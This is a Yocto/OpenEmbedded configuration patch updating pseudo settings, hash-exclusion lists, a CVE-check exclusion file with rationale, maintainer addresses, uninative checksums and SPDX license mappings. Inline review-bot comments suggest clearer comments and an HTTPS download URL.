-FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_DISABLED=0"
+FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=0"
FAKEROOTNOENV = "PSEUDO_UNLOAD=1"
FAKEROOTDIRS = "${PSEUDO_LOCALSTATEDIR}"
PREFERRED_PROVIDER_virtual/fakeroot-native ?= "pseudo-native"
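Review bot: `PSEUDO_IGNORE_PATHS` is introduced without a comment, although its contents decide which paths pseudo stops tracking, and therefore where ownership and mode changes made under fakeroot are not recorded. The entries look as if they are matched as prefixes (`/lib` has no trailing slash while `/usr/` and `/etc/` do, and `${WORKDIR}/deploy-` is a partial name), so a header would help, e.g. `# Comma-separated path prefixes that pseudo does not track; keep entries as narrow as possible`. An over-broad prefix added by a layer would silently switch off tracking for files that end up in packages, which is worth stating next to the variable.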
@@ -874,8 +882,8 @@ BB_CONSOLELOG ?= "${LOG_DIR}/cooker/${MACHINE}/${DATETIME}.log"
# Setup our default hash policy
BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
- SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+BB_HASHEXCLUDE_COMMON ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
+ THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
STAMPS_DIR PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_NOHASHDIR LICENSE_PATH SDKPKGSUFFIX \
@@ -883,12 +891,13 @@ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DI
BB_WORKERCONTEXT BB_LIMITEDDEPS BB_UNIHASH extend_recipe_sysroot DEPLOY_DIR \
SSTATE_HASHEQUIV_METHOD SSTATE_HASHEQUIV_REPORT_TASKDATA \
SSTATE_HASHEQUIV_OWNER CCACHE_TOP_DIR BB_HASHSERVE GIT_CEILING_DIRECTORIES"
-BB_HASHCONFIG_WHITELIST ?= "${BB_HASHBASE_WHITELIST} DATE TIME SSH_AGENT_PID \
+BB_HASHBASE_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} PSEUDO_IGNORE_PATHS BUILDHISTORY_DIR SSTATE_DIR "
+BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
SSH_AUTH_SOCK PSEUDO_BUILD BB_ENV_EXTRAWHITE DISABLE_SANITY_CHECKS \
PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
- BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT"
+ BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
file-checksums python func task export unexport noexec nostamp dirs cleandirs \
diff --git a/meta/conf/distro/include/cve-extra-exclusions.inc b/meta/conf/distro/include/cve-extra-exclusions.inc
new file mode 100644
index 0000000000..f3490db9dd
--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
+# This file contains a list of CVE's where resolution has proven to be impractical
+# or there is no reasonable action the Yocto Project can take to resolve the issue.
+# It contains all the information we are aware of about an issue and analysis about
+# why we believe it can't be fixed/handled. Additional information is welcome through
+# patches to the file.
+#
+# Include this file in your local.conf or distro.conf to exclude these CVE's
+# from the cve-check results or add to the bitbake command with:
+# -R conf/distro/include/cve-extra-exclusions.inc
+#
+# The file is not included by default since users should review this data to ensure
+# it matches their expectations and usage of the project.
+#
+# We may also include "in-flight" information about current/ongoing CVE work with
+# the aim of sharing that work and ensuring we don't duplicate it.
+#
+
+
+# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
+# CVE is more than 20 years old with no resolution evident
+# broken links in CVE database references make resolution impractical
+CVE_CHECK_WHITELIST += "CVE-2000-0006"
+
+# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
+# The issue here is spoofing of domain names using characters from other character sets.
+# There has been much discussion amongst the epiphany and webkit developers and
+# whilst there are improvements about how domains are handled and displayed to the user
+# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
+# problem. Whitelisted as there isn't any mitigation or fix or way to progress this further
+# we can seem to take.
+CVE_CHECK_WHITELIST += "CVE-2005-0238"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
+# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
+# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
+# Upstream don't see it as a security issue, ftp servers shouldn't be passing
+# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
+CVE_CHECK_WHITELIST += "CVE-2010-4756"
+
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
+# The encoding/xml package in go can potentially be used for security exploits if not used correctly
+# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
+# exposing this interface in an exploitable way
+CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
+
+# db
+# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
+# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
+CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
+CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
+CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
+CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
+CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
+# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
+# qemu maintainers say the patch is incorrect and should not be applied
+# Ignore from OE's perspectivee as the issue is of low impact, at worst sitting in an infinite loop rather than exploitable
+CVE_CHECK_WHITELIST += "CVE-2021-20255"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
+# There was a proposed patch but rejected by upstream qemu. It is unclear if the issue can
+# still be reproduced or where exactly any bug is.
+# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
+CVE_CHECK_WHITELIST += "CVE-2019-12067"
+
+# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
+# It is a fuzzing related buffer overflow. It is of low impact since most devices
+# wouldn't expose an assembler. The upstream is inactive and there is little to be
+# done about the bug, ignore from an OE perspective.
+CVE_CHECK_WHITELIST += "CVE-2020-18974"
+
+
+
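Review bot: The go entry (CVE-2020-29509, CVE-2020-29511) is justified by what OE-Core itself ships, but the file is meant to be included from a user's local.conf or distro.conf, where other layers may add Go software that parses untrusted XML. The comment should state that scope, for example `# Re-evaluate if any layer in your build ships Go code that uses encoding/xml on untrusted input`. The same applies in a weaker form to the nasm entry, whose reasoning assumes that devices do not expose an assembler. The db entry is the only one without NVD links, and `perspectivee` in the CVE-2021-20255 comment is a typo.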
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..038acc1504 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
# The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
# fetch from the network (and warn you if not). To disable the test set
# the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
-CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
+CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
#
# Please submit any patches against recipes in meta to the
# OE-Core mail list (openembedded-core@lists.openembedded.org)
-# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org)
+# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
#
# If you have problems with or questions about a particular recipe, feel
# free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
-RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
-RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>"
+RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
-RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
+RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>"
+RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
-RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
diff --git a/meta/conf/distro/include/ptest-packagelists.inc b/meta/conf/distro/include/ptest-packagelists.inc
index c13ff724b1..3fb7ec2657 100644
--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
liberror-perl-ptest \
libmodule-build-perl-ptest \
libpcre-ptest \
+ libpng-ptest \
libtimedate-perl-ptest \
libtest-needs-perl-ptest \
liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
# bash-ptest \ # Test outcomes are non-deterministic by design
# ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
# mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
+# libinput-ptest \ # Tests need an unloaded system to be reliable
#"
PTESTS_SLOW = "\
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 69b6edee5f..4ac66fd506 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
# to the distro running on the build machine.
#
-UNINATIVE_MAXGLIBCVERSION = "2.32"
+UNINATIVE_MAXGLIBCVERSION = "2.39"
+UNINATIVE_VERSION = "4.4"
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.9/"
-UNINATIVE_CHECKSUM[aarch64] ?= "9f25a667aee225b1dd65c4aea73e01983e825b1cb9b56937932a1ee328b45f81"
-UNINATIVE_CHECKSUM[i686] ?= "cae5d73245d95b07cf133b780ba3f6c8d0adca3ffc4e7e7fab999961d5e24d36"
-UNINATIVE_CHECKSUM[x86_64] ?= "d07916b95c419c81541a19c8ef0ed8cbd78ae18437ff28a4c8a60ef40518e423"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
+UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
+UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
+UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"
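Review bot: `UNINATIVE_URL` is rewritten here but still fetches over plain `http://`, so the pinned SHA-256 values in `UNINATIVE_CHECKSUM` are the only integrity protection for a binary that runs on the build host. If the download host serves HTTPS, `UNINATIVE_URL ?= "https://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"` would add transport protection on top of the checksums. `UNINATIVE_VERSION` is also set with `=` while the URL and checksums use `?=`. A comment saying that the version and the three checksums must be updated together would help anyone overriding them.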
diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf
index 0249f21d07..7453655417 100644
--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -100,4 +100,6 @@ SSTATE_EXCLUDEDEPS_SYSROOT += "\
SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
# We need to keep bitbake tools in PATH
-PATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}:${HOSTTOOLS_DIR}"
+# Avoid empty path entries
+BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
+PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"
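Review bot: In the new `PATH` line, `${BITBAKEPATH}` is substituted as text inside a Python string literal. As far as I can tell from BitBake's expansion order, a bitbake directory whose path contains a single quote would therefore produce a broken expression. Reading the variable through the datastore avoids that: `PATH := "${@(d.getVar('BITBAKEPATH') + ':') if d.getVar('BITBAKEPATH') else ''}${HOSTTOOLS_DIR}"`. The comment would also be more useful if it said why, e.g. `# Avoid empty path entries: an empty PATH component is searched as the current directory`.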
diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf
index 5b309eb385..c78823e847 100644
--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
+SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
# GPL variations
SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
+SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
+SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
+SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
#LGPL variations
SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
+SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
